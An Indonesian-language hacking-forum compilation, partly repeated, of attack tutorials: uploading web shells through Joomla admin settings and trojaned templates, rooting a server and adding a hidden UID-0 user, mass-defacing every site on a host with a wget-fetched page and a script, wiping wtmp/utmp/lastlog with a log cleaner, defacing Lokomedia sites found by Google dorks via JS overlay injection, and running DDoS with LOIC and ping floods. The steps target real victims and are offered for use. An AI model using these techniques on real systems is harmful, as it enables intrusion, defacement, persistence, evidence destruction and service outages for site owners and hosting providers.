4 trik Cara Upload Shell di Joomla
kali ini ane mo share bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. (ato mungkin repost)
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload
, lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload
, lokasi shell ada di http://korban.com/images/namashell.phpCARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
rooting - manual mass defacing (black Buntu)
Anak baru numpang posting yah,. ok langsung aja yah ga usah pake basa basi,.
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
![[Image: Screenshot.png]](http://bie.nazuka.net/rooting/Screenshot.png)
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
![[Image: Screenshot-1.png]](http://bie.nazuka.net/rooting/Screenshot-1.png)
tggal jalanin deh local yg sdah kmu upload tadi,.
![[Image: Screenshot-2.png]](http://bie.nazuka.net/rooting/Screenshot-2.png)
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
![[Image: Screenshot-3.png]](http://bie.nazuka.net/rooting/Screenshot-3.png)
klo udah berhasil,. jadi'a kek gini
![[Image: Screenshot-4.png]](http://bie.nazuka.net/rooting/Screenshot-4.png)
penjelasan'a,..
sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
![[Image: 52fe6d4c3f5f4e5fa6271db.png]](http://img708.imageshack.us/img708/5115/52fe6d4c3f5f4e5fa6271db.png)
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
untuk NamaUser, klian bisa lihat di shell kalian masing2...
![[Image: HdghNpj.png]](http://i.imgur.com/HdghNpj.png)
sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
![[Image: 88f8750f45984456a704565.png]](http://img40.imageshack.us/img40/1584/88f8750f45984456a704565.png)
setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
![[Image: 0OSGSIS.png]](http://i.imgur.com/0OSGSIS.png)
ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
![[Image: qm0DEhe.png]](http://i.imgur.com/qm0DEhe.png)
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
![[Image: 68beffb40e24488ba47018b.png]](http://img202.imageshack.us/img202/8761/68beffb40e24488ba47018b.png)
yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
![[Image: 1Jv4i7e.png]](http://i.imgur.com/1Jv4i7e.png)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
![[Image: bHx73vo.png]](http://i.imgur.com/bHx73vo.png)
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
dan terakhir kita jalankan remove'a,. :)
trus tggal masukin pilihan'a,.. :)
![[Image: 8CITRjF.png]](http://i.imgur.com/8CITRjF.png)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
![[Image: 312181284964474c9cc8a3f.png]](http://img855.imageshack.us/img855/4366/312181284964474c9cc8a3f.png)
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
comand2'a, lihat aja di gambar,..
setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
tggal jalanin deh local yg sdah kmu upload tadi,.
klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.
tahap akhir'a,. tggal add usermu aja distu,.
klo udah berhasil,. jadi'a kek gini
penjelasan'a,..
PHP Code:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M ftp-user
adduser = comand untuk nambahin user-u 0 -o = set user jadi dngn ID nol (0) root.
-g 0 = set initial group dengan ID nol (0) root.
-G 0,1,2,3,4,6,10 = set additional group ke:0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel-M – ‘home directory’ tidak di create ke user.ftp-user = username dri user yg mau dipke sekrang apa lagi,.??
ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
klo mau di deface, kita lanjut lagi,. :D
login di putty dan masukan ip server dan port yang mau kita mass deface,..
sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
PHP Code:
cd /etc/httpd/conf setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
comand'a :
PHP Code:
cat httpd.conf | grep -i ServerName > /home/NamaUser/public_html/web.txt sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
comand'a :
PHP Code:
cat httpd.conf | grep -i DocumentRoot > /home/NamaUser/public_html/user.txt setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
comand'a :
PHP Code:
cd /root; mkdir bie; cd bie
wget http://blablabla.com/deface.html ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
PHP Code:
chmod 777 mass.sh; ./mass.sh yep,.. selese mass deface'a,..
sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
lalu jalankan log cleaner kalian, trus exit.. :)
log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
cara pke'a :
1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
PHP Code:
find / -name wtmp -printfind / -name utmp -printfind / -name lastlog -printatau
whereis wtmp
whereis utmp
whereis lastlog Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..
2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
PHP Code:
gcc remove.c -o remove -DGENERIC
remove.c: In function `main':
remove.c:50: warning: return type of `main' is not `int'/tmp/ccZVzySI.o: In function `main':
/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should
not be used.
PHP Code:
./remove namarootuser trus tggal masukin pilihan'a,.. :)
terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
Tool :
shell yg aku pke diatas : http://pastebin.com/0N805eLE
log cleaner : http://pastebin.com/Csfw9BrY
NC : http://joncraton.org/media/files/nc111nt.zip
puttty : http://portableapps.com/apps/internet/putty_portable
Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
paling beda'a klo di windows pas mau gunain nc'a doank,.
harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
dah gtu aja,.. moga berguna yah,.. :)
credit : my best teacher Google
Deface Lokomedia Dengan JS Overlay dan Shell
Tutorial kali ini saya akan membahas tentang deface web dengan JS
Overlay dan Nanem Shell di Web, kalo buat sesepuh mahh udah lewat ajaa
:D
Langsung aja ke tutorial
Dork yang sering saya pakai buat Cari Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/
1.Search Google Pakai Dork Diatas
2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user
3. Kalo Muncul Kaya begini
![[Image: 2rnddll.png]](http://i41.tinypic.com/2rnddll.png)
berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita
4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
![[Image: 2mnnjn8.png]](http://i42.tinypic.com/2mnnjn8.png)
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..
5. Kalo udah muncul kayak gini, terus di gmana'in ?
![[Image: wj7whl.jpg]](http://oi41.tinypic.com/wj7whl.jpg)
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
Berikut Tutorialnya
JS Overlay
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell
terus buat file misalkan devilscream.js
lalu isikan Script berikut
http://newbie-security.or.id/code/js-overlay.txt
Nah, biar Web Lokomedianya ke deface gmana?
Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL
http://site/admin/media.php?module=berita
Kalo kagak bisa yah kagak bisa Dodgy
Lalu klik Add New Berita
Pada Bagian judul masukan Script berikut :
Isi atau lainnya gak usah di isi gak apa-apa
Setelah itu save, percuma kalo gak di save Dodgy
Tanem Shell
Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy
Atau gak cari Menu yang bisa upload file
![[Image: 10i9nrp.jpg]](http://oi40.tinypic.com/10i9nrp.jpg)
Setelah itu Klik AddNews
Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..
![[Image: 2ikwcya.jpg]](http://oi41.tinypic.com/2ikwcya.jpg)
Setelah di Upload masukin URL kaya gini
http://site/admin/foto_berita/nama_shell.php
kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php
Nah setelah itu Oprek deh Websitenya
Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool
Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin
Sekian dan terima kasih...
SUMBER : Newbie Security
Langsung aja ke tutorial
Dork yang sering saya pakai buat Cari Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/
1.Search Google Pakai Dork Diatas
2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user
3. Kalo Muncul Kaya begini
berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita
4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..
5. Kalo udah muncul kayak gini, terus di gmana'in ?
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
Berikut Tutorialnya
JS Overlay
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell
terus buat file misalkan devilscream.js
lalu isikan Script berikut
http://newbie-security.or.id/code/js-overlay.txt
Nah, biar Web Lokomedianya ke deface gmana?
Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL
http://site/admin/media.php?module=berita
Kalo kagak bisa yah kagak bisa Dodgy
Lalu klik Add New Berita
Pada Bagian judul masukan Script berikut :
Code:
http://situs-anda-menyimpan-file-js-overlay/devilscream.jsIsi atau lainnya gak usah di isi gak apa-apa
Setelah itu save, percuma kalo gak di save Dodgy
Tanem Shell
Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy
Atau gak cari Menu yang bisa upload file
Setelah itu Klik AddNews
Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..
Setelah di Upload masukin URL kaya gini
http://site/admin/foto_berita/nama_shell.php
kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php
Nah setelah itu Oprek deh Websitenya
Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool
Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin
Sekian dan terima kasih...
SUMBER : Newbie Security
pngertian DDOS
oke kali ini saya akan membahas tentang pengertian ddos dan cara
penggunaan'a =)) karna barusan ada yg menanyakan apa itu ddos =))
langsung to the point aja
apa sih DDOS itu?
Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).
Bagaimana cara kerja DDOS ?
Jika Anda memakai program windows , coba lakukan ini di komputer Anda.
1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t http://www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t http://www.situsyangdituju.com
Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.
Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan?
Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download KLIK DI SINI
Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.
Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?
Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.
Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.
biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.
Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.
1. Beri Nilai kemampuan finansial dari situs investasi tersebut.
- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.
sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :
Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar
Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.
2. Periksa kebenaran.
Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.
3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.
Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.
sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com
Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com
Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.
Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.
Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.
Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.
PING -t situsyangdituju.com
kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )
Cara Melakukan DDoS Attack
serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon.(308 kb)program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan http://www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
![[Image: zxzy.jpg]](http://zxzy.heck.in/files/zxzy.jpg)
cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
apa sih DDOS itu?
Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).
Bagaimana cara kerja DDOS ?
Jika Anda memakai program windows , coba lakukan ini di komputer Anda.
1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t http://www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t http://www.situsyangdituju.com
Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
